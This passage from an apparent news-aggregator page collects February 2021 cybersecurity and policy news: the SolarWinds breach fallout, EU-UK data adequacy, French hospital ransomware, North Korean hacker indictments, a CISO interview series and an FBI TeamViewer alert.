The former head of CISA, Christopher Krebs, told the House Homeland Security Committee this month that the U.S. should increase support to the agency, in part so it can issue grants to state and local governments to improve their cybersecurity and accelerate IT modernization across the federal government, which is part of the Biden proposal.
“Are we going to stop every attack? No. But we can take care of the most common risks and make the bad guys work that much harder and limit their success,” said Krebs, who was ousted by then-President Donald Trump after the election and now co-owns a consulting company whose clients include SolarWinds.
The breach was discovered in early December by the private security firm FireEye, a cause of concern for some officials.
“It was pretty alarming that we found out about it through a private company as opposed to our being able to detect it ourselves to begin with,” Avril Haines, the director of national intelligence, said at her January confirmation hearing.
Right after the hack was announced, the Treasury Department bypassed its normal competitive contracting process to hire the private security firm CrowdStrike, U.S. contract records show. The department declined to comment. Sen. Ron Wyden, D-Ore., has said that dozens of email accounts of top officials at the agency were hacked.
The Social Security Administration hired FireEye to do an independent forensic analysis of its network logs. The agency had a “backdoor code” installed like other SolarWinds customers, but “there were no indicators suggesting we were targeted or that a future attack occurred beyond the initial software installation,” spokesperson Mark Hinkle said.
Sen. Mark Warner, a Virginia Democrat who chairs the Senate Intelligence Committee, said the hack has highlighted several failures at the federal level but not necessarily a lack of expertise by public sector employees. Still, “I doubt we will ever have all the capacity we’d need in-house,” he said.
There have been some new cybersecurity measures taken in recent months. In the defense policy bill that passed in January, lawmakers created a national director of cybersecurity, replacing a position at the White House that had been cut under Trump, and granted CISA the power to issue administrative subpoenas as part of its efforts to identify vulnerable systems and notify operators.
The legislation also granted CISA increased authority to hunt for threats across the networks of civilian government agencies, something Langevin said they were only previously able to do when invited.
“In practical terms, what that meant is they weren’t invited in because no department or agency wants to look bad,” he said. “So you know what was happening? Everyone was sticking their heads in the sand and hoping that cyberthreats were going to go away.”
Brussels Okays EU-UK Personal Data Flows
20.2.2021 BigBrothers Securityweek
The European Commission lifted the threat of crucial data flows between Europe and Britain being blocked in a move that would have crippled business activity as it said Friday that privacy safeguards in the UK met European standards.
In a key post-Brexit decision, the EU executive said that British authorities had sufficient measures in place to protect European users' personal data, freeing up data transfers for businesses as well as for police.
The adequacy decision, to be formally adopted by the 27 member states, would ensure that data protection will "never be compromised when personal data travel across the Channel," said EU Justice Commissioner Didier Reynders.
Businesses will breath a sigh of relief at the decision, with more and more companies relying on cross-border cloud computing and other technology to function everyday.
This was made especially clear during the Covid-19 pandemic as companies, schools and governments increasingly went online, counting on big tech's networks to operate.
A negative decision would have blocked the transfer of data from EU-based companies to the UK, crippling activity.
- Sensitive issue -
Britain is seeking similar adequacy decisions for its financial services, but this is proving far more contentious, with Brussels giving no clear indication of when a decision will be made.
The EU currently has data adequacy agreements with 12 countries, including Japan, Switzerland and Canada and negotiations are underway with South Korea.
Once approved, personal data transferring through Britain will be treated as if it was moving within the EU.
Oliver Dowden, Britain's Secretary of State for Digital, said he welcomed the move "although the EU’s progress in this area has been slower than we would have wished."
"I am glad we have now reached this significant milestone following months of constructive talks in which we have set out our robust data protection framework," he added.
The security of personal data has become a sensitive issue, with the EU's top court having struck down a similar arrangement between the EU and United States.
The European Court of Justice has decided on several occasions that national security laws in the United States are in violation of European privacy standards making the deal illegal.
For the UK, the commission assessed that country's Investigatory Powers Act of 2016 which contains extensive powers including the ability to carry out bulk data surveillance.
The EU, however, found those powers were satisfactorily controlled by UK law and Britain's adherence to the European Convention of Human Rights.
The Business Software Alliance, a lobby group for big tech companies including Microsoft, Oracle and IBM said it was "delighted" by the decision.
"This will provide long-term confidence that data will continue to flow between the two partners post-Brexit," said BSA's Thomas Boue, policy chief for Europe.
Max Schrems, an Austrian lawyer and activist who led the fight against the EU's data arrangements with the US, tweeted that there were issues with the UK proposal on security that will require "deep analysis".
SolarWinds Hackers Stole Some Source Code for Microsoft Azure, Exchange, Intune
20.2.2021 BigBrothers Thehackernews
Microsoft on Thursday said it concluded its probe into the SolarWinds hack, finding that the attackers stole some source code but confirmed there's no evidence that they abused its internal systems to target other companies or gained access to production services or customer data.
The disclosure builds upon an earlier update on December 31, 2020, that uncovered a compromise of its own network to view source code related to its products and services.
"We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker had previously disclosed.
"The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated.".
Now according to the company, besides viewing few individual files by searching through the repositories, some cases involved downloading component source code related to —
a small subset of Azure components (subsets of service, security, identity)
a small subset of Intune components
a small subset of Exchange components
"The search terms used by the actor indicate the expected focus on attempting to find secrets," the company said, adding a subsequent verification affirmed the fact that they did not contain any live, production credentials.
Calling the SolarWinds supply chain attack a "moment of reckoning," Microsoft in January recommended organizations to adopt a "zero trust mentality" in order to achieve the least privileged access and minimize risks by enabling multi-factor authentication.
The company said the attacks have reinforced the need to embrace the Zero Trust mindset and protect privileged credentials.
It's worth noting that the entire espionage campaign leveraged the trust associated with SolarWinds software to insert malicious code that was then distributed to as many as 18,000 of its customers.
"Zero Trust is a proactive mindset," said Vasu Jakkal, corporate vice president for security, compliance, and identity at Microsoft. "When every employee at a company assumes attackers are going to land at some point, they model threats and implement mitigations to ensure that any potential exploit can't expand."
"The value of defense-in-depth is that security is built into key areas an actor might try to break, beginning at the code level and extending to all systems in an end-to-end way."
France to Boost Cyberdefense After Hospital Malware Attacks
19.2.2021 BigBrothers Securityweek
French President Emmanuel Macron on Thursday unveiled a plan to better arm public facilities and private companies against cybercriminals following ransomware attacks at two hospitals this month and an upsurge of similar cyber assaults in France.
The attacks at the hospitals in Dax and Villefranche-sur-Saone prompted the transfer of some patients to other facilities as the French health care system is under pressure from the coronavirus pandemic.
Macron discussed the attacks with officials and workers from both hospitals, saying the incident “shows how the threat is very serious, sometimes vital.”
“We are learning about these new attacks, some coming from states as part of new conflicts between nations, others coming from mafias,” the French leader said during a videoconference. Some attacks have “criminal” or “lucrative” motives, others are used to “destabilize” countries, he added.
Macron referred to a massive hack of U.S. federal agencies last year and to the stealing of vaccine documents from the European Medicine Agency in November.
He stressed the need for international cooperation among police and criminal justice agencies after Ukrainian authorities confirmed a ransomware program known as Egregor was dismantled in the country earlier this month following a joint action by the United States, France and Ukraine.
Macron’s office said the government will earmark about 500 million euros ($603 million) to help boost cyberdefense systems in the public and private sector.
The National Cybersecurity Agency of France (ANSSI) reported that ransomware attacks surged 255% in 2020 compared to the previous year. All sectors and geographical areas of the country were included, but the increase particularly concerns the health care sector, the education system, local authorities and digital service providers, ANSSI said.
During ransomware attacks, cybercriminals infect computers or computer systems with viruses that scramble and lock data until the targeted users pay a ransom.
The hospital in Villefranche-sur-Saone, located north of the city of Lyon, said its phone system went down during a cyberattack on Monday that forced a preemptive shutoff of the internet service and other networks to keep the ransomware from spreading.
The hospital also had to postpone surgeries planned for the following day. but said patient safety was preserved.
The Dax hospital in southwestern France reported a similar attack last week. Without phones and computers working, health care workers had to use pen and paper for record keeping.
The French cybersecurity agency is helping to investigate the attacks.
ANSSI said Monday that an attack similar to one used by Russian hackers targeted a software distributed by the French company Centreon, resulting in the breach of “several French entities” from late 2017 to 2020.
“This campaign bears several similarities with previous campaigns attributed to the intrusion set named Sandworm,” ANSSI said in a statement Monday.
Sandworm is a Russian military hacking group that U.S. security officials and cybersecurity experts said interfered in the 2016 presidential election in the United States, stealing and exposing Democratic National Committee emails and breaking into voter registration databases.
The group has also been blamed by the U.S. and U.K. governments for the June 2017 NotPetya cyberattack, which targeted businesses that operate in Ukraine. It caused at least $10 billion in damage globally, most notably to the Danish shipping multinational Maersk.
Hackers Target Myanmar Government Websites in Coup Protest
19.2.2021 BigBrothers Securityweek
Hackers attacked military-run government websites in Myanmar Thursday as a cyber war erupted after authorities shut down the internet for a fourth straight night.
A group called Myanmar Hackers disrupted multiple government websites including the Central Bank, Myanmar Military's propaganda page, state-run broadcaster MRTV, the Port Authority, Food and Drug Administration.
The move comes a day after thousands of people rallied across the country to protest against a military coup that toppled Aung San Suu Kyi's civilian government from power earlier this month.
"We are fighting for justice in Myanmar," the hacking group said on its Facebook page.
"It is like mass protesting of people in front of government websites."
Cybersecurity expert Matt Warren from Australia's RMIT University said it was likely the aim of the hacking was to generate publicity.
"The sorts of attacks they would be undertaking are denial of service attacks or defacing websites which is called hacktivism," he told AFP.
"The impact will be potentially limited but what they are doing is raising awareness."
Another internet shutdown began in Myanmar at about 1:00 am on Thursday (1830 GMT Wednesday), according to NetBlocks, a Britain-based group that monitors internet outages around the world.
It said internet connectivity had dropped to just 21 percent of ordinary levels.
US Still Unraveling ‘Sophisticated’ Hack of 9 Gov’t Agencies
18.2.2021 BigBrothers Securityweek
U.S. authorities are still working to unravel the full scope of the likely Russian hack that gave the “sophisticated” actor behind the breach complete access to files and email from at least nine government agencies and about 100 private companies, the top White House cybersecurity official said Wednesday.
Anne Neuberger, the newly appointed deputy national security adviser for cyber and emerging technology, also warned that the danger has not passed because the hackers breached networks of technology companies whose products could be used to launch additional intrusions.
A task force is investigating the extent of the damage from the breach, assessing potential responses and trying to confirm the identity of whoever was behind it — a process Neuberger warned will take more time.
“This is a sophisticated actor who did their best to hide their tracks,” she told reporters at the White House. “We believe it took them months to plan and execute this compromise. It will take us some time to uncover this layer by layer.”
U.S. authorities have said the breach, disclosed in December, appeared to be the work of Russian hackers. Neuberger, a former senior official at the National Security Agency who was appointed by President Joe Biden this month, went no further.
“An advanced, persistent threat actor likely of Russian origin was responsible,” she said, without providing any further details and sounding a cryptic note on potential responses.
“This isn’t the only case of malicious cyber activity of likely Russian origin, either for us or for our allies and partners,” Neuberger added. “So, as we contemplate future response options, we are considering holistically what those activities were.”
The Russian government has denied involvement.
Private security company FireEye was first to identify the breach, revealing that hackers hijacked widely used network software from SolarWinds Inc. to install malicious software through a what appeared to be a routine security update.
Intelligence agencies did not detect the breach because they largely have “no visibility into private-sector networks,” and it was launched within the U.S., Neuberger said. The Biden administration supports changes to “culture and authorities” that prevented the hack from being detected on the federal civilian systems, she added.
The hack, Neuberger said, highlights the need to modernize the nation’s IT infrastructure and its cyber defenses, issues that will be addressed in an upcoming executive order from Biden aimed at addressing security and technology gaps highlighted by the breach.
Several agencies have acknowledged that they were breached, including the Treasury Department and Justice Department, but the full list has not been publicly released. Once inside, the hackers had full access to the victims’ data.
“The techniques that were used lead us to believe that any files or emails on a compromised network were likely to be compromised,” Neuberger said.
Some members of Congress have criticized the response based on what they have been told so far, all in private. “The briefings we have received convey a disjointed and disorganized response to confronting the breach,” Sen. Mark Warner, a Democrat from Virginia, and Sen. Marco Rubio, Republican from Florida, said in a recent letter to the White House.
Neuberger said she intended to return to the Capitol to brief lawmakers in the coming days.
U.S. Charges North Korean Hackers Over $1.3 Billion Bank Heists
18.2.2021 BigBrothers Securityweek
Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe
The U.S. Justice Department on Wednesday announced the indictment of three North Korean military intelligence officials linked to high-profile cyber-attacks that included the theft of $1.3 billion in money and crypto-currency from organizations around the world.
The indictment alleges the trio was part of a “wide-ranging criminal conspiracy to conduct a series of destructive cyberattacks” against companies and crypto-currency exchanges around the world.
The DOJ described the scope of the North Korean hacking operation as “extensive and long-running”.
“The range of crimes they committed is staggering,'' said Acting U.S. Attorney Tracy Wilkison. “The conduct detailed in the indictment are the acts of a criminal nation-state that has stopped at nothing to extract revenge and obtain money to prop up its regime.”
North Korea
The new indictment expands on a 2018 case against the Pyongyang hacking group blamed for attacks against Sony Pictures,, the destructive Wannacry worm, a series of brazen online bank robberies against the global financial system, and ongoing ransomware extortion schemes.
The group, known publicly as Lazarus, has also been actively draining billions of dollars from hacks against crypto-currency exchanges.
The newest indictment adds two new North Korean defendants to the government’s case and named a third Canadian-American citizen who was part of the Lazarus group’s money laundering operations.
From the Justice Department announcement:
The hacking indictment filed in the U.S. District Court in Los Angeles alleges that Jon Chang Hyok (전창혁), 31; Kim Il (김일), 27; and Park Jin Hyok (박진혁), 36, were members of units of the Reconnaissance General Bureau (RGB), a military intelligence agency of the Democratic People’s Republic of Korea (DPRK), which engaged in criminal hacking. These North Korean military hacking units are known by multiple names in the cybersecurity community, including Lazarus Group and Advanced Persistent Threat 38 (APT38). Park was previously charged in a criminal complaint unsealed in September 2018.
The indictment blames the Lazarus group hackers for a wide range of publicly documented attacks, including the hack of Sony Pictures Entertainment in November 2014, the targeting of AMC Theatres later that year, and a 2015 intrusion into Mammoth Screen, which was producing a fictional series involving a British nuclear scientist taken prisoner in DPRK.
The U.S. government also linked the indicted hackers to billion-dollar bank heists that attacked the SWIFT (Society for Worldwide Interbank Financial Telecommunication) messaging system. The group is also charged with ATM cash-out schemes that stole $6.1 million from a Pakistan bank.
The government also detailed the group’s involvement in the Wannacry ransomware, the creation and deployment of malicious cryptocurrency applications, the development of multiple malicious cryptocurrency applications that gave the North Korean hackers a backdoor into the victims’ computers.
The Lazarus group has recently been flagged targeting security researchers involved in anti-malware research and other offensive exploit development work.
Earlier this week it was reported that North Korean hackers tried to hack into pharmaceutical giant Pfizer in a search for information on a coronavirus vaccine and treatment technology, adding to previous activity associated with the rogue nation trying to access COVID-19 related research.
In July 2017, researchers from Recorded Future monitored internet traffic from North Korea. One of its conclusions was that "most state-sponsored activity is perpetrated from abroad." Recorded Future suggested at the time that North Korean malicious activity most likel originates from countries such as India, Malaysia, New Zealand, Nepal, Kenya, Mozambique, and Indonesia.
In late September 2017, the United States Cyber Command reportedly engaged in offensive activity against North Korea, by launching a DDoS attack against its military spy agency, the Reconnaissance General Bureau (RGB). The attack occurred just five weeks after President Trump elevated U.S. Cyber Command to a Unified Combatant Command.
CISO Conversations: Princeton, Cal State and Ohio State CISOs Talk Higher Ed Cybersecurity
18.2.2021 BigBrothers Securityweek
CISO Conversations: Princeton, Cal State and Ohio State Security Chiefs Discuss Their Roles in the Higher Education Sector
Princeton, Cal State and Ohio State CISOs Discuss Cybersecurity and Their Roles in the Higher Education Sector
The higher education sector is like no other vertical among the critical industries. Each institution resembles a municipality, comprising retail, healthcare, physical security, fire station and police force – and perhaps 10,000 new potential student hackers every year.
It requires a special quality of CISO, and in this installment of SecurityWeek's CISO Conversations series, we talk to three of the best: David Sherry (Princeton University), Ed Hudson (California State University) and Helen Patton (Ohio State University).
Personal attributes
So, what does it take to be a CISO in higher education? David Sherry has two suggestions. The first is the ability to understand the culture of your organization. This will vary across sectors and between companies.
“Our mission statement,” he explained, “is to make security programmatic and cultural. And you cannot do that without understanding the culture that you’re in. I could not do my job at Princeton with the mindset of working at a top ten bank. They’re not the same. If I tried to utilize the same methodology and vision of the banking industry in higher ed, well, I’d be tarred and feathered on the main green pretty quickly. So, understanding that culture is first.”
The second, he added, is coolness under pressure – you cannot be a leader if you panic. “People like to see someone who takes command in a pressured situation, whether it’s 48 hours to flip your model from on-campus to off-campus in response to COVID-19, or an attack coming from a nation-state or whatever.”
Helen Patton’s suggestion possibly encompasses these – and much more – in two simple words: a CISO needs ‘emotional intelligence’.
Recruitment and diversity
Staff recruitment and diversity are issues that are closely related and important to all CISOs. Recruitment is made difficult because of the huge skills gap in cybersecurity, while increased diversity – in this instance focused on increasing the number of women engineers – is seen as a method of closing that gap. But the advantages of diversity go beyond just adding numbers to the potential labor pool.
Ohio State“Diversity is a passion of mine,” comments Hudson. “It’s very important in higher education, but it’s also important for society in general.” There is evidence, he suggests, to show that when you intentionally leverage diversity of thought, race, religion, and gender, you get better solutions to problems. “When you can bring together diversity of background, diversity of thinking, diversity of approach you just get a view that is more dynamic than the myopic view of continuing to do things in the same old way.”
With women in cybersecurity, there is one fascinating statistic: the ratio of women to men CISOs is far higher than the general ratio of women to men engineers. This raises an interesting question: is there something in the female psyche that makes women particularly suited to security leadership?
Ohio’s Helen Patton thinks not – or at least not in such simple terms. “I’ve met female CISOs that I hugely respect, and I’ve met female CISOs I don’t; and I think that’s true for men as well. So, I’m hesitant to stereotype a class of people, male or female, as being more of this or less of that. I still look at the individual and the circumstance in which they work as being more important.”
But there is a proviso. “I think one thing that is a common experience for women in this profession is to be the outsider. You can’t help it; every conference you go to, every meeting you go to, you are the one or the two percent in the room if you are lucky. This forces you firstly to see things from a slightly different perspective and recognize that you’re seeing from a different perspective; and secondly to try to find a way to bridge back to whatever the common conventional wisdom is and to question it.”
For Patton, what women bring that is new is not from being a woman, but from being a minority. “I think there are skills that are honed when you are a minority candidate of any minority, that you are forced to hone just because of your experience. But sometimes in some organizations that’s a positive and sometimes that’s a negative and so it’s hard to generalize.”
Nevertheless, it supports Hudson’s view that diversity is a wider issue than just male/female, while succeeding from a minority background will require and hone Patton’s ‘emotional intelligence’.
Hierarchy, soft skills, compliance, and the higher education culture
The CISO’s need for, and use of, soft skills is a theme that recurs through this series. Usually it is in terms of bridging the gap between the official reporting structure and the reporting structure required to be efficient. Most CISOs believe that the modern CISO needs to be both a businessperson and a techie.
Businessperson or techie?
“I am both,” says Patton. She has a strong technical team around her, but relies on her own technical skills to understand and guide them. “My day-to-day job,” she adds, “is primarily exercising my business skills – everything from emotional intelligence to business planning, and organizational planning, strategic planning, legal compliance, and risk – that’s where I spend my time. It’s not arguing about firewall configurations and endpoint management tools.”
Sherry believes the balance depends upon the organization, particularly in terms of size. Small concerns may need a rock solid technical CISO who is more tactical than strategic. In larger concerns, so long as the technology is working, the CISO may need to be more strategic and businesslike; “But I do agree,” he adds, “that having the right balance between the two is probably best.”
Most top CISOs are not too concerned about their position within the corporate – or in this case the educational – hierarchy, so long as they can influence if not control security policy. Influence comes down to relationships which comes down to soft skills.
Hierarchy
The optimal position within the organization’s hierarchy is a continuous debate among CISOs. Surprisingly, most top CISOs are not too concerned, provided only that they can effect change where and when it is necessary. “I have two bosses,” comments Patton, “I report to the CIO who reports to the Provost who, in a non-higher ed environment, would be considered the Chief Operating Officer – and he reports to the President. So, through that lens, I am three layers down from the President. My other direct report is the Chief Compliance Officer who reports to the head of legal who reports to the Board. So, in that regard, I am two or three layers down from the Board.”
But, she continued, “It works. My philosophy on this is organizationally there is no pedantically correct answer to that question. It depends on the institution and whether or not you can be effective in the role you are in. Here, even though I am two or three levels down from the top of the tree, I get to have regular interaction with the top of the tree. I have bosses who allow me to speak freely. We are not overly hierarchical in terms of messaging in our organization.”
However – and this is important – she is philosophically opposed to the CISO reporting to the CIO. It works in her case, “My personal thoughts on this is if you take personalities out of the equation, it is not appropriate for the CISO to report to the CIO. But you can’t take personalities out of the equation so I think it can work, although I think, philosophically, it is not the preferred option.”
Princeton UniversitySherry has a similar view. “The easiest answer to where the CISO should sit is where he or she can have the most influence – and that depends on the vertical and the organization. But I believe the CISO should sit in the IT structure. I report to the CIO, as do many other CISOs – but I believe the best situation is to be equal with the CIO reporting up to whoever the CIO reports to.” That time hasn’t yet come, but Sherry believes it must. Ideally, the CISO should control his own budget; or at least, like Sherry, have “a CIO who is extremely security-minded and security-conscious so I never have to worry about my budget being cut.”
Both Patton and Hudson have a proviso to these viewpoints. Hudson suggests that, “If you’re in a situation that is not a good fit for you, then you’re not in the right organization. You probably need to go to an organization that’s more the fit for the type of CISO you want to be.” Patton adds that the CISO must first try to change the situation so that it works. If that’s not possible, she says, “You don’t really have much of a choice but to look for something different.”
Soft skills
Hudson believes that soft skills are also necessary for the smooth running of the higher education culture. Here they are necessary to bridge the divide between strict compliance requirements and more relaxed student attitudes.
Compliance is an issue on its own. Some CISOs see it as a boon to security, some see it as a burden, and others see it as both. “It can be a boon in terms of possibly getting extra staff or technology or consulting dollars,” says Sherry; “or at least, shining a light on the need for it. But it can certainly be a burden when it’s just a litany of checkboxes on a checklist.”
Compliance is complex in higher education because each institution involves huge numbers of potentially vulnerable young people – including healthcare, finance, intellectual property, physical security and more. While staff welfare can be largely handled by HR within traditional corporations, student welfare is subject to its own range of regulations. For this reason, Patton believes that the CISO must not be the compliance officer. “In the context of higher education, the CISO should absolutely not be the Compliance Officer,” she says. “I am the Compliance Officer as it relates to technology and risk. I play that role, but in a higher ed environment there are so many kinds of compliance – everything from sexual harassment to occupational health and safety, and to all those things. There is more to compliance in my world than just technology – there are many kinds of compliance that need to be considered. and for that purpose, I report to the Compliance Officer.”
Cal State University logoHudson’s view is complex – he fears the rigors of compliance can interfere with the culture of higher education. “It is probably one of the more challenging areas, for CISOs in general, but certainly for CISOs in higher ed”, he says. “There are two flavors of CISO. There’s the compliance-driven – I call that the Abominable No-man – who simply says ‘you must’, ‘you shall’, or ‘we have to do this’ – and I think you are going to be very frustrated if you are that kind of a CISO in higher ed. And then there’s the one that casts the wider net, the more strategic net; so, the balance is how do we meet our compliance requirements and not be seen as, or construed as, or be a barrier to what the institution is trying to accomplish. And that’s one of our more challenging issues.”
This is the second use of soft skills – being able to be legally compliant but not operationally obstructive.
It’s a challenge, but one of those fascinating challenges that has kept Hudson within the higher education sector. “I get to address issues around banking regulation, healthcare information, privacy regulations – regulations having to do with the student records and how we safeguard those. We’re a state agency so we have numerous state regulations. It makes for an interesting job, for sure. But the balance is, how do we fulfil those requirements and do it in a way that we don’t become a barrier, or be perceived as a barrier, to academic attainment and student success.”
The secret, he suggests, is for security to be frictionless. “My ideal is that information security should be happening behind the scenes. My users are aware of security, but are not slowed down by it. We place a high degree of importance on communication and awareness; so, when we roll out a technology that maybe causes a little bit of friction, people understand why it is necessary. They become part of the process. Then you can look at something like multi-factor authentication which requires an extra step in the process. But if we’ve done a good job, it doesn’t become friction, because they understand why we’re doing it and what’s happening behind it, what the benefit is to them.”
Advice
Recognizing and learning from good advice is an essential process in the development of strong leaders. For Helen Patton, the advice was an epiphany moment when she was told, ‘You’re right, but you’re not being effective.’ “Like a lot of security people and a lot of CISOs,” she said, “we pride ourselves on being smart and we pride ourselves on having a lot of data, and we leverage that data to pound our point forward. It was following a meeting when I was told this. Yes, I was accurate, and I was saying the correct thing; but my message was not getting across. It really made me step back and go ‘it’s not enough to be right – it does not mean people are going to act on your recommendations. You must win their heart and mind. Heart and mind – not just their mind.’ It’s all about influence and persuasion and, dare I say it, coercion and knowing when to apply those skills.”
David Sherry recalls advice he was given – some of which reflects the advice given to Helen Patton. “Speak with data,” he said, “but don’t speak in techie language. You must put the right data into the right context for businesspeople. They’re not interested that your firewall stopped 1.2 million suspicious requests last week, they’re only interested in the one or two that weren’t stopped.”
The other advice he took to heart was that, ”Until you have earned trust and created relationships, be slow to speak and quick to listen. You have to find out what people want before you can offer solutions. You cannot suddenly appear like a knight in shining armor who’s going to solve world peace overnight.”
The advice Ed Hudson received came early in his career, when he still had a linear analytical approach to security and threats. He understood the security and threats of his time very well – but the reality is you don’t get caught by what you know, but by what you don’t know. “You have to be flexible,” he was told. “You have to be ready for contingencies – be flexible.”
That is the advice that Hudson offers to emerging security leaders. Patton, however, says, ‘know yourself and your team.’ “To be a leader in security, as an individual you got to know yourself – but as a leader of a team you’ve also got to understand the boundaries of what your team is willing to do and what it’s not; where you’re willing to lead your team and where you’re not. ‘Know thyself’ is still probably for me the best advice for a budding leader.”
Sherry’s advice is to thoroughly understand the culture of your organization – which is probably different in higher education than in any other vertical sector. “When I was in the banking industry,” he comments, “I had the authority to say ‘thou shalt do this, and thou shalt not do that’ because I was protecting $250 billion of other people’s money. It’s not like that in higher education, where being the CISO is like being the CISO of a small city. I have a fire station, I have a police squad, a rescue squad, I have museums, public parks, parents, donors, visitors, athletic teams, sports boosters, as well as all the faculty staff and the students. And in all this I have to provide an environment that remains conducive to learning and academic exploration.”
Future threats
Unsurprisingly, given such a wide threat landscape, there is little agreement over the greatest coming threats to the sector. Sherry and Hudson are concerned with the more ‘traditional’ threats. Hudson sees them coming from the criminal use of artificial intelligence (AI). We’ve seen AI’s value in detecting threats, but we haven’t yet seen how it will inevitably be used in conducting cyber-attacks.
For Sherry, the threats come from the explosion of IoT devices. “Everything now seems to have some kind of chip in it, needs to have some firmware upgrade, needs to have some security mindset,” he said. “I’m not worried about the Microsofts and the Oracles and the PeopleSofts – I’m worried about the new light bulbs coming in, or the new security camera that’s going up. They may be fine for now, but 18 months down the line they could be attacking me because everything new now has its own IP address.”
Patton takes a completely different view. “I think our government regulations are probably the biggest threat to higher education,” she said. “The people giving advice to our governments and our regulators are big companies that are private industry profit driven. Most of higher ed is not private industry profit driven. There is a different purpose for higher education, particularly a research education institution, and the regulations that we are being asked to comply with often don’t align easily with higher ed. There is huge pressure on higher education to be cheaper. This is going to get worse as we have to reskill an awful lot of people whose jobs are going away because of the COVID-19 pandemic. We need to be cheaper and we need to be faster. That’s fine; but at the same time, we’ve got regulators who are coming in and imposing regulations on us that make us not cheap and not fast. We’re in conflict, and that’s really challenging.”
Sharing
Effective sharing of information on threats and solutions is something frequently urged but rarely achieved. This is not so in higher education – many of the leading institutions belong to an organization known as Educause, where the former CISO of Quinnipiac University, Brian Kelly, is director of the cybersecurity program.
“I am an avid supporter of Educause,” comments Ed Hudson. “It gives me a whole cadre of people to go to, who, if they haven’t already solved an issue, they’re solving it at the same time as I am trying to solve it.”
Apart from peer advice, Educause members also work on sector-specific security tools. “The group has done some great things when you look at the tools that we have developed, collaboratively, together within Educause. Things like the higher education information security community security maturity assessment tool (HESCSMAT) – a self-assessment tool that higher-ed organizations can use to help assess the maturity of their security program. And there’s the higher education cloud-vendor assessment tool (HECVAT) which allows us to assess the security posture of cloud vendors.”
For the moment, Educause within the higher education sector is unique – but it is perhaps a model that other sectors could emulate. “I think a lot of industry silos could benefit from this kind of approach,” continued Hudson. “It’s one of the challenges in cybersecurity – we haven’t always been good at sharing with each other. That’s not the case in higher ed. We’re ready to reach out to our brothers and sisters and say, ‘help me solve this’. I didn’t see that when I was in the private sector. There it’s one of those things where you hold your cards closer to the chest for all the understandable reasons. But I do think that the Educause approach would be really beneficial to other industry verticals.”
North Korea 'Tried to Hack' Pfizer for Vaccine Info - South's Spies: Reports
17.2.2021 BigBrothers Securityweek
North Korean hackers tried to break into the computer systems of pharmaceutical giant Pfizer in a search for information on a coronavirus vaccine and treatment technology, South Korea's spy agency said Tuesday, according to reports.
The impoverished, nuclear-armed North has been under self-imposed isolation since closing its borders in January last year to try to protect itself from the virus that first emerged in neighbouring China and has gone on to sweep the world, killing more than two million people.
Leader Kim Jong Un has repeatedly insisted that the country has had no coronavirus cases, although outside experts doubt those assertions.
North Korea
And the closure has added to the pressure on its tottering economy from international sanctions imposed over its banned weapons systems, increasing the urgency for Pyongyang to find a way to deal with the disease.
Seoul's National Intelligence Service "briefed us that North Korea tried to obtain technology involving the Covid vaccine and treatment by using cyberwarfare to hack into Pfizer", MP Ha Tae-keung told reporters after a parliamentary hearing behind closed doors.
North Korea is known to operate an army of thousands of well-trained hackers who have attacked firms, institutions and researchers in the South and elsewhere.
Pfizer's coronavirus vaccine, developed jointly with Germany's BioNTech, began winning approval from authorities late last year.
It is based on technology that uses the synthetic version of a molecule called "messenger RNA" to hack into human cells and effectively turn them into vaccine-making factories.
Pfizer says it expects to potentially deliver up to 2 billion doses in 2021.
The company's South Korean office did not immediately respond to a request for comment by AFP.
Both it and BioNTech said in December that documents relating to their vaccine were "unlawfully accessed" during a cyberattack on a server at the European Medicines Agency, the EU's medicine regulator.
The comments came after the Amsterdam-based EMA said it had been the victim of a hacking attack, without specifying when it took place or whether its work on Covid-19 was targeted.
Cyber-heists
The allegations come only a week after a confidential UN report seen by AFP said North Korea had stolen more than $300 million worth of cryptocurrencies through cyberattacks in recent months to support its weapons programmes.
Financial institutions and exchanges were hacked to generate revenue for Pyongyang's nuclear and missile development, the document said, with the vast majority of the proceeds coming from two thefts late last year.
Pyongyang's cyberwarfare abilities first came to global prominence in 2014 when it was accused of hacking into Sony Pictures Entertainment as revenge for "The Interview", a satirical film that mocked leader Kim.
The attack resulted in the posting of several unreleased movies as well as a vast trove of confidential documents online.
The North is also accused of a huge, $81 million cyber-heist from the Bangladesh Central Bank, as well as the theft of $60 million from Taiwan's Far Eastern International Bank.
Pyongyang's hackers were blamed for the 2017 WannaCry global ransomware cyberattack, which infected some 300,000 computers in 150 nations, encrypting user files and demanding hundreds of dollars from their owners for the keys to get them back.
Pyongyang has denied the accusations, saying it has "nothing to do with cyber-attacks".
Nuclear talks between it and Washington have been stalled since a summit between Kim and then-president Donald Trump in February 2019 broke down over sanctions relief and what Pyongyang would be willing to give up in return.
North Korea showed off several new missiles at military parades in October and last month, when Kim pledged to strengthen his nuclear arsenal.
FBI’s alert warns about using Windows 7 and TeamViewer
15.2.2021 BigBrothers Securityaffairs
The FBI is warning companies about the use of out-of-date Windows 7 systems, desktop sharing software TeamViewer, and weak account passwords.
The FBI issues this week a Private Industry Notification (PIN) alert to warn companies about the risks of using out-of-date Windows 7 systems, poor account passwords, and desktop sharing software TeamViewer.
The alert comes after the recent attacks on the Oldsmar water treatment plant’s network where attackers tried to raise levels of sodium hydroxide, by a factor of more than 100. The investigation into the incident revealed that operators at the plant were using out-of-date Windows 7 systems and poor account passwords, and the desktop sharing software TeamViewer was used by the attackers to breach the network of the plant.
“The attempt on Friday was thwarted. The hackers remotely gained access to a software program, named TeamViewer, on the computer of an employee at the facility for the town of Oldsmar to gain control of other systems, Sheriff Bob Gualtieri said in an interview.” reported the Reuters.
The alert urges organizations to review internal networks and mitigate the risks posed by the above factors.
“Beyond its legitimate uses, TeamViewer allows cyber actors to exercise remote control over computer systems and drop files onto victim computers, making it functionally similar to Remote Access Trojans (RATs),” states the FBI’s PIN alert. “TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to typical RATs.”
The FBI alert warns of the abuse of desktop sharing software like TeamViewer, threat actors could abuse them access target network once obtained the login credentials of its employees. Below the recommendations provided by the alert:
TeamViewer Software RecommendationsFor a more secured implementation of TeamViewer software:
Do not use unattended access features, such as “Start TeamViewer with Windows” and“Grant easy access.”
Configure TeamViewer service to “manual start,” so that the application and associatedbackground services are stopped when not in use.
Set random passwords to generate 10-character alphanumeric passwords.
